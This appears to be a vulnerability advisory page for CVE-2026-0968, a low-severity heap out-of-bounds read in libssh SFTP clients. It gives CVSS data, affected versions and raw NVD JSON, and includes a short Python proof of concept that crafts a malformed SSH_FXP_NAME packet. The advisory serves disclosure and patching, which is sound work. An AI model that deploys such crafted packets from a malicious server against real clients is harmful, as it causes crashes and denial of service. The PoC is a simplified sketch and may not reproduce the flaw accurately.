Security Vulnerability Report
CVE-2026-0968 CVSS 3.1 LOW

Published: 2026-03-26 21:17:01
Last Modified: 2026-05-19 14:16:38

Description

A flaw was found in libssh. A malicious SFTP (SSH File Transfer Protocol) server can exploit it by sending a malformed 'longname' field within an `SSH_FXP_NAME` message during a file listing operation. Because of a missing null check, this can lead to reading beyond allocated memory on the heap, which can cause unexpected behavior or a denial of service (DoS) due to application crashes.

CVSS Details

CVSS Score: 3.1
Severity: LOW
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:libssh:libssh:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:redhat:enterprise_linux:10.0:*:*:*:*:*:*:* - VULNERABLE
libssh < 0.11.4
libssh < 0.12.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import socket
import struct

# Simulated Malicious SFTP Server for CVE-2026-0968 PoC
# This script demonstrates the generation of a malformed SSH_FXP_NAME packet.

def create_malicious_sftp_name_packet():
    # Packet Type: SSH_FXP_NAME (104)
    packet_type = 104
    request_id = 1
    count = 1
    filename = b"exploit.txt"

    # Malformed longname: This field is crafted to trigger the missing null check
    # leading to a heap out-of-bounds read in the vulnerable libssh client.
    malformed_longname = b"A" * 1000  # Excessive length or missing null terminator

    # Construct payload (simplified structure)
    payload = struct.pack('!I', request_id)
    payload += struct.pack('!I', count)
    # Filename string (4-byte length + data)
    payload += struct.pack('!I', len(filename)) + filename
    # Longname string (4-byte length + malformed data)
    payload += struct.pack('!I', len(malformed_longname)) + malformed_longname
    # Dummy attributes (flags)
    payload += struct.pack('!I', 0)

    # Full packet: 4-byte length + 1-byte type + payload
    full_packet = struct.pack('!I', len(payload) + 1) + struct.pack('!B', packet_type) + payload
    return full_packet

# Note: This is a conceptual payload generator.
# A full exploit would require implementing the SSH handshake and SFTP protocol channel.
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-0968", "sourceIdentifier": "[email protected]", "published": "2026-03-26T21:17:01.150", "lastModified": "2026-05-19T14:16:38.457", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in libssh in which a malicious SFTP (SSH File Transfer Protocol) server can exploit this by sending a malformed 'longname' field within an `SSH_FXP_NAME` message during a file listing operation. This missing null check can lead to reading beyond allocated memory on the heap. This can cause unexpected behavior or lead to a denial of service (DoS) due to application crashes."}, {"lang": "es", "value": "Se encontró una falla en libssh en la que un servidor SFTP (Protocolo de Transferencia de Archivos SSH) malicioso puede explotar esto enviando un campo 'longname' malformado dentro de un mensaje 'SSH_FXP_NAME' durante una operación de listado de archivos. Esta falta de verificación de nulos puede llevar a leer más allá de la memoria asignada en el heap. 
Esto puede causar un comportamiento inesperado o llevar a una denegación de servicio (DoS) debido a fallos de la aplicación."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L", "baseScore": 3.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.6, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L", "baseScore": 3.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.6, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:libssh:libssh:*:*:*:*:*:*:*:*", "versionEndIncluding": "0.11.3", "matchCriteriaId": "2366D711-FD0B-4A04-92BA-DE6DA0ED1BCF"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "7F6FB57C-2BC7-487C-96DD-132683AEB35D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "D65C2163-CFC2-4ABB-8F4E-CB09CEBD006C"}]}]}], "references": [{"url": "https://access.redhat.com/errata/RHSA-2026:18160", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:18683", "source": "[email protected]"}, {"url": 
"https://access.redhat.com/security/cve/CVE-2026-0968", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436982", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.libssh.org/2026/02/10/libssh-0-12-0-and-0-11-4-security-releases/", "source": "[email protected]", "tags": ["Release Notes"]}]}}